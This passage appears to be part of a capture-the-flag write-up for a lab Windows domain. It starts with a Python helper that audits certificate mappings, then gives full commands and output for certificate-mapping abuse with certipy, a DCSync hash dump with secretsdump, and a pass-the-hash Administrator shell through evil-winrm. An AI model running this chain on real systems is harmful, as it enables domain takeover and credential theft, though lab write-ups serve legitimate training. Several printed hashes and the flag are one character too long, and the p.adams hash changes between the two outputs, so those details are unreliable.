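    return set(parse_mapping(mapping)) in STRONG_TAG_SETS


def audit_user_mappings(user: str, mappings, issued_certs):
    """Classify each altSecurityIdentities value on `user` (hypothetical helper).

    issued_certs: records with 'subject' (the principal the CA issued the
    certificate to), 'issuer' (CN-first DN) and 'serial' (big-endian hex).
    Returns (mapping, verdict, reason) tuples."""
    by_mapping = {build_mapping(c["serial"], c["issuer"]): c for c in issued_certs}
    findings = []
    for m in mappings:
        fields = parse_mapping(m)
        if not is_strong_mapping(m):
            findings.append((m, "WEAK", "mapping type is weak under KB5014754"))
        elif "SR" not in fields:
            findings.append((m, "UNCHECKED", "only <I><SR> mappings are matched here"))
        elif m not in by_mapping:
            findings.append((m, "UNKNOWN", "no issued certificate has this issuer/serial"))
        elif by_mapping[m]["subject"].lower() != user.lower():
            who = by_mapping[m]["subject"]
            findings.append((m, "MISMATCH", f"certificate was issued to {who}, not {user}"))
        else:
            findings.append((m, "OK", "strong mapping to this user's own certificate"))
    return findings


# Constructed sample: the Machine-template certificate issued to meow$ on this page.
ISSUER_DN = "CN=scepter-DC01-CA,DC=scepter,DC=htb"
MEOW_SERIAL = "62:00:00:00:05:C9:A8:7A:F9:61:ED:F4:8E:00:00:00:00:00:05"
ISSUED_CERTS = [{"subject": "meow$", "issuer": ISSUER_DN, "serial": MEOW_SERIAL}]


def demo():
    """Audit p.adams as the page leaves it: meow$'s certificate mapped onto
    p.adams, plus a constructed weak <S> mapping for contrast."""
    mappings = [build_mapping(MEOW_SERIAL, ISSUER_DN), "X509:<S>CN=p.adams"]
    return audit_user_mappings("p.adams", mappings, ISSUED_CERTS)


if __name__ == "__main__":
    for mapping, verdict, reason in demo():
        print(f"{verdict:9} {reason}\n          {mapping}")
```

In a real audit the issued-certificate records would come from the CA database (certutil -view) and the mappings from each user's altSecurityIdentities attribute.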


┌──(root㉿kali)-[/home/kali/Desktop/HTB/Specter]
└─# ntpdate -u xx.xx.xx.xx

┌──(root㉿kali)-[/home/kali/Desktop/HTB/Specter]
└─# ntpdate -u xx.xx.xx.xx | certipy-ad auth -pfx meow.pfx -dc-ip 10.10.11.65 -username p.adams
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[!] The provided username does not match the identification found in the provided certificate: 'P.ADAMS' - 'meow$'
Do you want to continue? (Y/n) [*] Using principal: p.adams@scepter.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'p.adams.ccache'
[*] Trying to retrieve NT hash for 'p.adams'
[*] Got hash for 'p.adams@scepter.htb': aad3b435b51404eeaad3b435b51404ee:1b925c524f447bb821a8789c4b118c7e0

Because this certificate is mapped to p.adams through altSecurityIdentities, obtaining the TGT works.
Even though the certificate was created for meow$, we bound it to p.adams and succeeded in obtaining a TGT

The p.adams user is a member of REPLICATION OPERATORS, and through it a DCSync attack can be carried out, so we do that

┌──(root㉿kali)-[/home/kali/Desktop/HTB/Specter]
└─# python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -just-dc -hashes aad3b435b51404eeaad3b435b51404ee:1b925c524f447bb821a8789c4b118c7e0 scepter.htb/p.adams@dc01.scepter.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a291ead3493f9773dc615e66c2ea217c4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c030fca580038cc8b1100ee37064a4a9:::
scepter.htb\d.baker:1106:aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce:::
scepter.htb\a.carter:1107:aad3b435b51404eeaad3b435b51404ee:2e24650b1e4f376fa574da438078d200:::
scepter.htb\h.brown:1108:aad3b435b51404eeaad3b435b51404ee:4ecf5242092c6fb8c360a08069c75a0c:::
scepter.htb\p.adams:1109:aad3b435b51404eeaad3b435b51404ee:1b925c524f447bb821a8789c4b118ce0:::
scepter.htb\e.lewis:2101:aad3b435b51404eeaad3b435b51404ee:628bf1914e9efe3ef3a7a6e7136f60f3:::
scepter.htb\o.scott:2102:aad3b435b51404eeaad3b435b51404ee:3a4a844d2175c90f7a48e77fa92fce04:::
scepter.htb\M.clark:2103:aad3b435b51404eeaad3b435b51404ee:8db1c7370a5e33541985b508ffa24ce5:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:0a4643c21fd6a17229b18ba639ccfd5f:::
[*] Kerberos keys grabbed
[*] Cleaning up...

We connect through evil-winrm using the administrator hash


┌──(root㉿kali)-[/home/kali/Desktop/HTB/Specter]
└─# evil-winrm -i scepter.htb -u administrator -H a291ead3493f9773dc615e66c2ea217c4

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint


*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir

Directory: C:\Users\Administrator\Desktop

Mode LastWriteTime Length Name


---- ------------- ------ ----
-ar--- 4/20/2025 2:50 PM 34 root.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt


bfa210003342f1962a476d176a2fe57dd
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
